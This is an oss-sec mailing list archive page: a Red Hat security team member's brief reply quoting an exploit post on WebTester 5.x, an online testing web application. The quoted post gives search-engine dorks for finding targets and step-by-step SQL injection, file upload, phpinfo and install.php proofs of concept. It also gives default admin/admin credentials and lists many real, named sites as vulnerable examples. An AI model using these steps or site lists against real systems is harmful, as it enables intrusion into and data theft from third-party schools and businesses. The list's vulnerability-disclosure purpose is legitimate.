oss-sec mailing list archives

Re: WebTester 5.x Multiple Vulnerabilities


From: Kurt Seifried <kseifried () redhat com>
Date: Tue, 15 Oct 2013 23:37:55 -0600

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 10/15/2013 07:30 PM, X-Cisadane wrote:
==========================================================================================
 WebTester 5.x Multiple Vulnerabilities 
==========================================================================================


:--------------------------------------------------------------------------------------------------------------------------

 --------------: : # Exploit Title : WebTester 5.x Multiple
Vulnerabilities : # Date : 15 October 2013 : # Author : X-Cisadane
 : # CMS Developer : http://epplersoft.com/webtester.html : # CMS
Source Code : http://sourceforge.net/projects/webtesteronline/ : #
Version : ALL : # Category : Web Applications : # Vulnerability :
SQL Injection, Arbitrary File Upload, PHPInfo() Disclosure,
Leftover install.php File : # Tested On : Google Chrome Version
26.0.1410.64 m (Windows XP SP 3 32-Bit English) : # Greetz to :
X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H,
Jakarta Anonymous Club, Jabar Cyber,

Winda Utari 
:--------------------------------------------------------------------------------------------------------------------------

 --------------:

DORKS (How to find the target) : ================================ 
intext:Copyright © 2003 - 2010 Eppler Software 
inurl:/go.php?testID= intitle:WebTester Online Testing Or use your
own Google Dorks :)

Proof of Concept ================

[ 1 ] SQL Injection POC : 
http://[Site]/[Path]/startTest.php?FirstName=a&LastName=a&TestID=['SQLi]
 Example : 
http://simuladodireitocespe.com/startTest.php?FirstName=a&LastName=a&TestID='5
 
http://www.huertos.eu/encuesta/startTest.php?FirstName=a&LastName=a&TestID='5
 
http://autoskola-buratrans.com/templates/default/ispiti/startTest.php?FirstName=a&LastName=a&TestID='5
 
http://conalepnl091.sytes.net/simulador/startTest.php?FirstName=a&LastName=a&TestID='5
 
http://learnin.elschool.pl/startTest.php?FirstName=a&LastName=a&TestID='5
 ...etc...



[ 2 ] Arbitrary File Upload through TinyMCE (plugins/filemanager)
 Webster 5.x has a built-in WYSIWYG Editor, that is TinyMCE. The
attacker can upload file through the TinyMCE File Manager. It can
be found in tiny_mce/plugins/filemanager.

Poc : 
http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
 Example the target is http://onlinetests.germaniak.eu/ Change the
url to 
http://onlinetests.germaniak.eu/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
 Pic #1 : http://i40.tinypic.com/117z390.png Then tick : Insert
filetype icon, Insert file size & Insert file modification date. 
Click upload and wait until the file sent to the server. Pic #2 :
http://i39.tinypic.com/2wluaon.png Pic #3 :
http://i40.tinypic.com/2uh0fir.png If the file was successfully
uploaded, check in the /test-images/ directory. For Example : 
http://onlinetests.germaniak.eu/test-images/ 
http://www.rzecznik.org/test/test-images/ 
http://simula.se/fun/webtester5/test-images/ 
http://811lifestylecoach.com/test-images/ 
http://umpire-test.splashprojects.co.uk/test-images/ 
http://zamoweb.altervista.org/test-images/ ...etc...



[ 3 ] PHPInfo() Disclosure POC : http://[Site]/[Path]/phpinfo.php 
Example : 
http://mhsquiz.marbleheadschools.org/webtester/phpinfo.php 
http://test.auzefiu.com/phpinfo.php 
http://test.deltaschools.com/phpinfo.php 
http://www.noordskool.com/toetse/phpinfo.php 
http://bocahomehealth.com/exam/phpinfo.php ...etc...


[ 4 ] Leftover install.php File POC :
http://[Site]/[Path]/install.php Example : 
http://www.ibeucamposmacae.com.br/webtester5/install.php 
http://briefhealthprograms.com/webtester5/install.php 
http://intgvna.gardnervna.org/test/install.php 
http://delarcollege.com/POSTUTME/install.php 
http://www.orionhs.org/webtester/install.php ...etc...

How is this a security issue specifically? can you run the installer
again or something?


Bonus : Default Username and Password Username : admin Password :
admin Admin Control Panel : http://[Site]/[Path]/admin/

Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung 
Teruuusss...! 
------------------------------------------------------------------------


- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (GNU/Linux)

iQIcBAEBAgAGBQJSXiYyAAoJEBYNRVNeJnmTJagP/3vj0hzF3sBWrnz1n5GBMGQd
xiEf5jnoyYNEwQzkHg6BF9yxB4o6Q1Px5hN51F4GMuHtorfiMMOP8qmB/1VXtXbt
O3vwNX9LE3SspSX6SCTn0/2mYsEyNjV2jwUia+Y2I8txTGGRglTjF+/BIYnFQLvV
4eVaN0B+9Xu1PAiia/KyHHsg5sbREa9h1SoWok+2aUyqnnq6YUbOzWzhcSKjuXJt
tjBKWGp3XqigERxH87KPzuzkkxxlt1xgy5dURT6f2o0rHCJkhRwDKVuDCIJp70+B
P4bU9jnxwOXnanFaHq1dzmoj1Y3RyX2T58KQIdDVwXYaD+BIAabuGVSvTmAxktM6
FfbZtQZTB1TTurb/yO3GGFUq7PP9cst/57M3aVT6+LdUzCGxbRclFGnVDI9rYSWT
HIi+yme2I2ALxxRQQAp9vW4f7VNvPzdAsMLCzEeYskjQKV2jQB5VFjwCIZ7lXZCE
B6bjsifGHYXfhHK0Oqs75Hj6CpHtY9bTQmN7pUGNGb9tGEHuCn6AUkPeMo+nL1eN
aeC8dGlNTGMIxEIVjE7yTq3MkNyUcCkTfZG2KsrYVotWxYOfksK00E4IcQweYKE9
mgMBAz2BeIJKsEPP/4E8IQxU7/gHnvAf3cy6KR9bIFr26R7P0e+7hqqtKKboztPr
Gx30g5X9B1IeyNKunmSc
=10xl
-----END PGP SIGNATURE-----


Current thread: